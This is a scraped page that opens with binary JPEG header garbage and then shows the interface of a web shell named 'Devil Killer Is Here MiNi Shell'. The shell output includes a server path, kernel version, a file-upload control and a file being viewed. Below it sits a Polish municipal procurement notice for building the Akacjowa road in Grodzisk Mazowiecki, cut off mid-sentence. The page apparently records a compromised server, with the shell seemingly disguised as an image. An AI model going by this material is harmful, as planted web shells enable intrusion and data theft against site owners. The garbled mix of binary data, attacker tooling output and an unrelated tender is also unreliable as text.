JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210630/0009950902-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00099509 z dnia 2021-06-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa drogi gminnej o nr 150701W ul. Akacjowa w Grodzisku Mazowieckim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GRODZISK MAZOWIECKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269137</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. T. Kościuszki 32A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grodzisk Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-825</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@grodzisk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.grodzisk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa drogi gminnej o nr 150701W ul. Akacjowa w Grodzisku Mazowieckim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4d123719-d981-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00099509</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010776/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.53 Akacjowa oraz budowa nowej drogi gminnej na odcinku od ul. Dalekiej do Nowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zawarte zostały przez Zamawiającego w rozdziale XIII i XIV SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że: <br/>1)	administratorem danych osobowych osób fizycznych jest Burmistrz Grodziska Mazowieckiego;<br/>2)	Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować pocztą elektroniczną na adres: email: abi@grodzisk.pl, tel.: 22 755 55 34; <br/>3)	dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia 2016/679 w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego - Oznaczenie sprawy: ZP.271.65.2021;<br/>4)	w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 rozporządzenia 2016/679;<br/>5)	osoba fizyczna posiada:<br/>a)	na podstawie art. 15 rozporządzenia 2016/679 prawo dostępu do danych osobowych jej dotyczących;<br/>b)	na podstawie art. 16 rozporządzenia 2016/679 prawo do sprostowania swoich danych osobowych;<br/>c)	na podstawie art. 18 rozporządzenia 2016/679 prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy rozporządzenia 2016/679;<br/>6)	osobie fizycznej nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679;<br/>c)	na podstawie art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1 lit. c rozporządzenia 2016/679. <br/>2.	Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.65.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Nazwa zadania: Budowa drogi gminnej o nr 150701W ul. Akacjowa w Grodzisku Mazowieckim<br/>Zamówienie obejmuje: <br/>I.	Budowa drogi gminnej od ul. Dalekiej do ul. Nowej w Grodzisku Mazowieckim <br/>II.	Budowa drogi gminnej ul. Akacjowej w Grodzisku Mazowieckim.<br/><br/>2.	Ogólny zakres robót obejmuje:<br/>I. Budowa nowej drogi gminnej - od ul. Dalekiej do ul. Nowej w Grodzisku Mazowieckim<br/>1.	ROBOTY DROGOWE I ODWODNIENIE <br/>1.1	Roboty przygotowawcze<br/>1.1.1.	Wycinka i karczowanie<br/>1.1.2.	Roboty rozbiórkowe i wyburzeniowe<br/>1.1.3.	Roboty rozbiórkowe nawierzchni<br/>1.2	Roboty ziemne<br/>1.3	Krawężniki i nawierzchnie<br/>1.3.1.	Droga gminna<br/>1.3.2.	Budowa ronda na skrzyżowaniu z ul. Montwiłła <br/>1.4.	Oznakowanie<br/>1.5.	Odwodnienie (kanalizacja deszczowa)<br/>1.6.	Inne roboty <br/>1.7.	Kanał technologiczny<br/>1.8.	Melioracja (budowa przepustu drogowego)<br/><br/>2.	ROBOTY MONTAŻOWE OŚWIETLENIA ULICZNEGO<br/>2.1.	Demontaż linii napowietrznej oświetlenia ulicznego typu 2xAL25 mm2<br/>2.2.	Budowa oświetlenia ulicznego - ułożenie kabli typu YAKXS 4x25 mm2<br/>2.3. Budowa oświetlenia ulicznego - ułożenie kabla typu YAKXS 4x25 mm2 na istniejących słupach oświetleniowych<br/>2.4.	Budowa oświetlenia ulicznego - montaż słupów i lamp oświetleniowych <br/>2.5.	Budowa oświetlenia ulicznego - montaż złącza kablowe ZK-1+SL+SOK<br/>2.6.	Pomiary pomontażowe <br/>2.7.	Roboty dodatkowe formalno-prawne<br/><br/>3.	USUNIĘCIE KOLIZJI NAPOWIETRZNEJ SIECI NN 0,4 kV<br/>3.1.	Demontaż istniejącej sieci (usunięcie kolizji)<br/>3.2.	Prace budowlano - montażowe - sieć nN-0,4kV<br/>3.2.1.	Sieć elektroenergetyczna kablowa nN-0,4 kV typu YAKXS 4x120 mm2 - linie kablowe<br/>3.2.2.	Sieć elektroenergetyczna kablowa nN-0,4 kV typu YAKXS 4x120 mm2 - wyprowadzenia kablowe na słupy<br/>3.2.3.	Sieć elektroenergetyczna kablowa nN-0,4 kV typu YAKXS 4x120 mm2 - wymiana przyłączy napowietrznych<br/>3.3.	Roboty dodatkowe<br/><br/>II. Budowa drogi gminnej ul. Akacjowa w Grodzisku Mazowieckim.<br/>1.	ROBOTY DROGOWE I ODWODNIENIE <br/>1.1	Roboty rozbiórkowe i przygotowawcze<br/>1.2	Roboty ziemne<br/>1.3	Krawężniki i nawierzchnie<br/>1.4.	Oznakowanie<br/>1.5.	Odwodnienie (kanalizacja deszczowa)<br/>1.6.	Inne roboty <br/>1.7.	Kanał technologiczny<br/><br/>Szczegółowy zakres robót objętych umową określony jest w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót budowlanych oraz SWZ.<br/>Roboty będą realizowane na podstawie dokumentacji projektowej wykonanej przez Jednostkę projektową: HORYZONT – USŁUGI PROJEKTOWO INŻYNIERSKIE mgr inż. Adam Grzyb, ul. S. Lilpopa 11a, 05-8490 Brwinów, wymienionej poniżej:<br/> Budowa nowej drogi gminnej - od ul. Dalekiej do ul. Nowej w Grodzisku Mazowieckim: <br/>I.	Dokumentacja budowlana:<br/>1)	Projekt budowlany – Projekt zagospodarowania terenu, projekt Architektoniczno-budowlany – drogi, odwodnienie, oświetlenie, Projekt Architektoniczno-budowlany – Usunięcie kolizji napowietrznej sieci NN 0,4 kV z projektowanym profilem skrzyżowania ulicy projektowanej z ulicą Montwiłła, polegający na przebudowie sieci napowietrznej na sieć kablową <br/>II.	Dokumentacja wykonawcza<br/>1)	Projekt wykonawczy - drogi,<br/>2)	Projekt wykonawczy – energetyka,<br/>3)	Projekt wykonawczy – odwodnienie (kanalizacja)<br/>4)	Projekt wykonawczy – oświetlenie<br/>5)	Rozbiórki, <br/>6)	Organizacja ruchu,<br/>7)	Gospodarka zielenią<br/>8)	Specyfikacje techniczne wykonania i odbioru robót<br/>9)	Przedmiary robót.<br/><br/>Budowa nowej drogi gminnej - od ul. Dalekiej do ul. Nowej w Grodzisku Mazowieckim: <br/><br/>I.	Dokumentacja budowlana:<br/>1)	Projekt budowlany – Projekt zagospodarowania terenu, projekt Architektoniczno-budowlany.<br/>II.	Dokumentacja wykonawcza<br/>2)	Projekt wykonawczy – drogi, <br/>3)	Projekt wykonawczy – kanalizacja<br/>4)	Organizacja ruchu,<br/>5)	Zieleń – wycinka,<br/>6)	Opinia geotechniczna, <br/>7)	Specyfikacje techniczne wykonania i odbioru robót<br/>8)	Przedmiary robót.<br/><br/><br/>Uwaga 1: Załączone przedmiary robót mają charakter pomocniczy. Szczegółowy zakres robót objętych umową określony jest w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót budowlanych oraz SWZ.<br/><br/>Uwaga 2: Zamawiający wymaga, aby szerokości nawierzchni asfaltowej ścieżki rowerowej oraz chodników z kostki brukowej na całej długości wykonywane były bez wliczania szerokości krawężników i obrzeży betonowych. <br/><br/>Uwaga 3: Materiały drogowe z rozbiórki istniejących nawierzchni drogowych drogi powiatowej ul. Montwiłła (krawężniki, kostka brukowa, destrukt asfaltowy i kora asfaltowa) związane z budową ronda Wykonawca jest zobowiązany jest przekazać – przetransportować po rozbiórce do Powiatowego Zarządu Dróg w Grodzisku Maz. – adres transportu i rozładunku: ul. Marsa 12, Kozerki, 05-025 Grodzisk Maz.<br/><br/>Uwaga 4: Materiały drogowe z rozbiórki istniejących nawierzchni drogowych dróg gminnych ul. Daleka, ul. Nowa (krawężniki, kostka brukowa) Wykonawca jest zobowiązany jest przekazać – przetransportować po rozbiórce do Zamawiającego – adres transportu i rozładunku: Zakład Gospodarki Komunalnej ul. Chrzanowska 15, 05-825 Grodzisk Maz.<br/><br/>Uwaga 5: Płyty z rozbiórki istniejących nawierzchni betonowych (płyty MON) Wykonawca jest zobowiązany wykorzystać do utwardzenia nawierzchni ulic w odległości do 7 km od lokalizacji rozbiórki. W skład robót wchodzi: wykonanie jezdni z płyt żelbetowych MON (z rozbiórki) na podsypce piaskowej gr. około 5 cm i warstwie odsączającej z piasku o gr. 10 cm wraz z wykonaniem koryta o głębokości ok. 20 cm. Pobocza z kruszywa (klińca kamiennego warstwa 10 cm.) o szer. 0,75 m. Według schematu układania płyt załączonego do dokumentacji projektowej.<br/><br/>Uwaga 6: Pozostałe materiały z rozbiórki takich elementów jak ogrodzenia, obiekty kubaturowe (wiaty, budynki murowane, itp.), Wykonawca jest zobowiązany do zagospodarowania we własnym zakresie.<br/><br/>Uwaga 7: W ramach inwestycji Wykonawca dopełni formalności niezbędnych do podpisania umów z PGE Dystrybucja dotyczących przebudowy linii energetycznych. Koszt ww. formalności ponosi Wykonawca.<br/><br/>Uwaga 8: Zamawiający wymaga aby ułożyć dodatkowy kabel zasilający YKY 3x2,5mm2 do monitoringu wzdłuż trasy budowanego oświetlenia. Przy każdym słupie oświetleniowym zostawić zapas kabla ok.2m.<br/><br/>Uwaga 9: Do nasadzeń dogęszczających należy przyjąć sadzonki o parametrach: Wysokość pnia Pa.: min. 2,2 m. Obwód mierzony na wysokości 1 m.: 18 – 20 mm. <br/><br/><br/>3. Podstawowe warunki i wymagania dotyczące realizacji robót:<br/>1) W budowie nawierzchni dróg należy stosować kruszywo z pokruszonego surowca skalnego, kamieni narzutowych lub otoczaków. Nie dopuszcza się użycia kruszyw z pokruszonego betonu. <br/>2)	Wykonawca ma obowiązek zlecić na własny koszt nadzór techniczny nad robotami w zbliżeniu z istniejącymi mediami gestorom tych mediów (ZWiK sp. z o.o., PGE, PGNiG, operator telekomunikacyjny) oraz usunąć na własny koszt kolizje z istniejącymi mediami.<br/>3)	Nadmiar ziemi z wykopów Wykonawca musi odwieźć na legalne dostępne składowisko.<br/>4)	Wykonawca ma obowiązek zapewnić możliwość korzystania (dojazdu) z działek sąsiadujących z budowaną drogą w trakcie robót.<br/>5)	Wykonawca ma obowiązek przed rozpoczęciem robót zabezpieczyć istniejące na terenie krzewy i drzewa. Kolidujące z robotami nasadzenia Wykonawca usunie na własny koszt (łącznie z karpami) po otrzymaniu od Zamawiającego odpowiedniego pozwolenia.<br/>6)	Rozliczanie terminowo-rzeczowe i finansowe realizacji inwestycji dokonywane będzie w oparciu o harmonogram Wykonawcy. Zmiana harmonogramu wymaga zgody Zamawiającego wyrażonej na piśmie pod rygorem nieważności.<br/>7)	Zakres robót określa dokumentacja projektowa, STWIORB i SWZ. W przypadku rozbieżności w ustaleniach poszczególnych elementów dokumentacji projektowo-ryczałtowej obowiązuje zakres najszerszy i najkorzystniejszy dla Zamawiającego, przy czym szczegółowe jego ustalenie musi być dokonane pisemnie, wpisem do dziennika budowy.<br/>8)	Zamawiający zabrania stosowania materiałów szkodliwych dla otoczenia. Materiały nieodpowiadające wymaganiom zostaną usunięte z terenu budowy na koszt Wykonawcy.<br/>9)	Wykonawca ma obowiązek zabezpieczenia składowanych materiałów, narzędzi i sprzętu przed zanieczyszczeniem, uszkodzeniem, kradzieżą, zagrożeniem dla osób postronnych.<br/>10)	Sprzęt stanowiący własność Wykonawcy lub wynajęty powinien posiadać dopuszczenie do użytkowania – dokumenty potwierdzające ten fakt muszą być okazane na żądanie inspektora nadzoru.<br/>11)	Wykonawca jest odpowiedzialny za pełną kontrolę robót i jakość materiałów użytych do realizacji zamówienia przez siebie i swoich podwykonawców. Inspektor nadzoru dopuści do użycia tylko te materiały, które posiadają wymagane certyfikaty, dopuszczenia, atesty itp., w tym certyfikat na znak bezpieczeństwa, wskazujący, że zapewniono zgodność z Polskimi Normami, krajowymi ocenami technicznymi oraz właściwymi przepisami i dokumentami technicznymi lub, które posiadają deklaracje zgodności z Polską Normą lub krajową oceną techniczną dla wyrobów dla których nie ustanowiono Polskiej Normy. <br/>12)	Szczegółowe rozwiązania materiałowe muszą być uzgadniane z Zamawiającym.<br/>13)	Obowiązkiem Wykonawcy będzie zapewnienie i przestrzeganie warunków bhp, zabezpieczenie interesów osób trzecich, naprawa ewentualnych szkód wyrządzonych w trakcie realizacji inwestycji, ochrona mienia związanego z budową (materiały i sprzęt Wykonawcy oraz mienie użytkownika).<br/>14)	Wykonawca zobowiązany jest do zabezpieczenia placu budowy od terenów ogólnie dostępnych.<br/><br/>Szczegółowy opis przedmiotu zamówienia zawiera Rozdział IV do SWZ i załącznik i nr 5, 7 i 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232300-5 - Roboty budowlane i pomocnicze w zakresie linii telefonicznych i ciągów komunikacyjnych</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45316213-1 - Instalowanie oznakowania drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">11.	Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt 7) p.z.p. w wysokości do 30% wartości zamówienia. Zamówienie obejmowałoby: roboty drogowe, roboty instalacyjne elektryczne, teletechniczne. Warunki udzielenia zamówienia: <br/>1) Zamówienie zostanie udzielone w jednym lub kilku zamówieniach w przypadku gdy Zamawiający będzie posiadał środki finansowe na jego realizację.<br/>2) Wycena robót objętych zamówieniami zostanie dokonana na podstawie cen nie wyższych niż podane w ofercie dla takich lub podobnych robót, a w przypadku braku takiej możliwości na podstawie kosztorysów opracowanych na bazie aktualnych KNR przy zastosowaniu średnich cen i składników cenotwórczych dla województwa mazowieckiego, publikowanych w aktualnym na czas wyceny, wydawnictwie Sekocenbud lub Bistyp. Ceny materiałów „M” i pracy sprzętu „S” przyjmowane będą jako ceny średnie podawane przez te wydawnictwa, a w przypadku ich braku w tych wydawnictwach, wg hurtowych cen zakupu. W/w wycena zostanie wykonana każdorazowo przez Wykonawcę i przedłożona Zamawiającemu do akceptacji i ewentualnej korekty. Strony umowy mogą również określić inny sposób dokonania wyceny w/w robót.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej Zamawiający kierował się będzie<br/>kryteriami wskazanymi w SWZ oraz sposobem oceny ofert w ramach tych kryteriów opisanym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie 